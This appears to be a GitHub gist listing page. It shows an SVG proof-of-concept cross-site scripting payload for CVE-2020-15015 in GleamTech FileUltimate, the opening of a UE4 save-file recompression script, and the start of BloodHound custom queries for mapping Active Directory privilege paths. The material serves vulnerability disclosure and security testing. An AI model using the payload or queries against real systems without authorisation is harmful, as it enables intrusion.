Skip to content

Instantly share code, notes, and snippets.

@chppppp
chppppp / xss.svg.txt
Last active Jun 24, 2020
CVE-2020-15015 GleamTech FileUltimate 6.1.5.0 - 7.5.0.0 XSS in SVG payload
View xss.svg.txt
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("XSS");
</script>
</svg>
View ue4_save_game_extractor_recompressor.py
#!/usr/bin/env python3
# Python 3 code that will read, decompress, and then recompress the UE4 game
# save file that Astroneer uses.
#
# Though I wrote this for tinkering with Astroneer games saves, it's probably
# generic to the Unreal Engine 4 compressed saved game format.
import zlib
import sys
@chppppp
chppppp / customqueries.json
Created Sep 6, 2019 — forked from seajaysec/customqueries.json
bloodhound custom queries - there may be dupes
View customqueries.json
{
"queries": [
{
"name": "Find all Domain Admins",
"queryList": [
{
"final": true,
"query":
"MATCH (n:Group) WHERE n.objectsid =~ {name} WITH n MATCH p=(n)<-[r:MemberOf*1..]-(m) RETURN p",
"props": {
You can’t perform that action at this time.